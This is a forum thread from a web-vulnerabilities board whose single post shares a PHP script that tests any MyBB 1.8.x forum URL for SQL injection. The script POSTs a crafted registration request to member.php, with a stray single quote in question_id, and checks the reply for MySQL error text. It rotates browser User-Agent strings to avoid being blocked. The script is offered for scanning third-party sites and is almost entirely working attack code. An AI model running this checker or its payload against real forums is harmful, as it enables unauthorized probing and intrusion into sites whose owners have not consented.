
MyBB 1.8.X SQLi Checker

Thread in Web vulnerabilities created by RaysMorgan Oct 31, 2015. 1756 views

  1. RaysMorgan
    RaysMorgan Topic starter Oct 31, 2015 Че скажете 54,004 Mar 7, 2013
    Code

    <?php
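    // Entry point: takes a board base URL in ?q=, sends one registration POST
    // to <base>/member.php through SendPost(), and reports whether the response
    // contains MySQL's syntax-error text.
    //
    // NOTE(review): each request makes this server issue an outbound POST to a
    // caller-chosen URL, so the script is itself an SSRF surface and should not
    // be reachable by unauthenticated users.
    $query = isset( $_GET[ 'q' ] ) ? $_GET[ 'q' ] : null;

    // q[]=x arrives as an array; the string functions below must only see a string.
    if ( !is_string( $query ) )
    {
        echo "Invalid parameters, are you drunk?";
    }
    else
    {
        $host = $query;

        // Require a real http(s) URL with a host part. A bare "starts with http"
        // prefix test would also accept values such as "httpfoo".
        $parts = parse_url( $host );
        $isHttpUrl = is_array( $parts )
            && isset( $parts[ 'scheme' ], $parts[ 'host' ] )
            && in_array( strtolower( $parts[ 'scheme' ] ), array( 'http', 'https' ), true );

        if ( $isHttpUrl )
        {
            //Removing trailing slashes
            $host = rtrim( $host, '/' );

            // $host is request data and is echoed into the page below; escape it
            // so the checker does not reflect markup supplied in ?q=.
            $safeHost = htmlspecialchars( $host, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8' );

            //Initial SQL Injection check
            // question_id ends in a lone single quote; the check below looks for
            // the database error text that the response may contain as a result.
            $newHost = $host . '/member.php';
            $data = "regcheck1=&regcheck2=true&username=makman&password=mukarram&password2=mukarram&email=mak@live.com&email2=mak@live.com&referrername=&imagestring=F7yR4&imagehash=1c1d0e6eae9c113f4ff65339e4b3079c&answer=4&allownotices=1&receivepms=1&pmnotice=1&subscriptionmethod=0&timezoneoffset=0&dstcorrection=2&regtime=1416039333&step=registration&action=do_register&regsubmit=Submit+Registration!&question_id='";
            $response = SendPost( $newHost, $data );

            if ( !is_string( $response ) )
            {
                // curl_exec() returned false (DNS, connect, TLS, ...). Nothing was
                // learned about the board, so do not report it as "not vulnerable".
                printf( "%s could not be checked, the request failed.", $safeHost );
            }
            elseif ( strpos( $response, "You have an error in your SQL syntax" ) !== false )
            {
                printf( "%s is vulnerable to MyBB 1.8.X SQL Injection!", $safeHost );
            }
            else
            {
                // The result rests on the board printing the database error. A
                // patched board and a board that hides SQL errors both end up
                // here, so this outcome is not proof that the board is patched.
                printf( "%s is not vulnerable to MyBB 1.8.X SQL Injection!", $safeHost );
            }
        }
        else
        {
            echo "Invalid host, needs to have a protocol -> http://apples.org/path/to/forums";
        }
    }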

    //Dont get useragent blocked
    /**
     * Return one entry from a fixed list of eight browser User-Agent strings.
     *
     * The entry is picked with rand(), so consecutive calls may return
     * different values.
     *
     * @return string One of the hard-coded User-Agent strings.
     */
    function getRandomUserAgent()
    {
        $pool = array(
            "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6",
            "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)",
            "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)",
            "Opera/9.20 (Windows NT 6.0; U; en)",
            "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.50",
            "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.02 [en]",
            "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; fr; rv:1.7) Gecko/20040624 Firefox/0.9",
            "Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/48 (like Gecko) Safari/48"
        );

        // Inclusive upper bound for rand(): the index of the last list entry.
        $lastIndex = count( $pool ) - 1;

        return $pool[ rand( 0, $lastIndex ) ];
    }

    //Send a post request
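    /**
     * POST a pre-encoded form body to a URL and return the response body.
     *
     * The URL comes from request data in this script, so the transfer is
     * limited to HTTP(S), does not follow redirects and has timeouts.
     *
     * @param string $site Absolute URL the request is sent to.
     * @param string $post URL-encoded form body handed to CURLOPT_POSTFIELDS.
     * @return string|false Response body, or false when the transfer failed.
     */
    function SendPost( $site, $post )
    {
        $ch = curl_init();
        if ( $ch === false )
        {
            return false;
        }

        curl_setopt_array( $ch, array(
            CURLOPT_URL            => $site,
            CURLOPT_RETURNTRANSFER => true,
            CURLOPT_USERAGENT      => getRandomUserAgent(),
            CURLOPT_POSTFIELDS     => $post,
            // Refuse file://, gopher:// and other schemes libcurl may support.
            CURLOPT_PROTOCOLS      => CURLPROTO_HTTP | CURLPROTO_HTTPS,
            // A redirect must not steer the request to a different host.
            CURLOPT_FOLLOWLOCATION => false,
            // Without timeouts an unresponsive host keeps the PHP worker busy.
            CURLOPT_CONNECTTIMEOUT => 5,
            CURLOPT_TIMEOUT        => 15,
        ) );

        $response = curl_exec( $ch );
        curl_close( $ch );

        return $response;
    }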
    ?>
     